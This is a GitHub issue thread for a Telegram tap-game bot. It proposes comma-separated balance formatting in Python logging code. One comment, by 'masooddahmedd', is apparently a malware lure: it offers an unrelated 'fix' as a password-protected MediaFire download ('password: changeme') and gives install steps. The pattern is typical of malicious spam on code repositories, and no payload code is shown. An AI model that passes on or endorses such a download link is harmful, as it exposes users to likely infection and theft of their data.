### ISSUE TITLE
Balance Format

### ISSUE THREAD

**Issue by Visualua** [vanhbakaa/Cexio-Tap-bot#7]
How about adding a format for the balance with a separator for better readability?

```
                balance_usd = float(data_response['balance_USD'])
                balance_btc = int(data_response['balance_BTC']) / 100000
                balance_cexp = float(data_response['balance_CEXP'])

                self.coin_balance = balance_usd
                logger.info(
                    f"Account name: {data_response['first_name']} - "
                    f"Balance: <yellow>{balance_usd:,.2f}</yellow> - "
                    f"Btc balance: <green>{balance_btc:,.2f}</green> - "
                    f"Power: <blue>{balance_cexp:,.2f}</blue> CEXP"
                )
```

**Ex:** Account name: Account_1 - Balance: 1,234,567.89 - Btc balance: 1,234.30324 - Power: 577,177 CEXP

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by vanhbakaa** [comment]
i already did
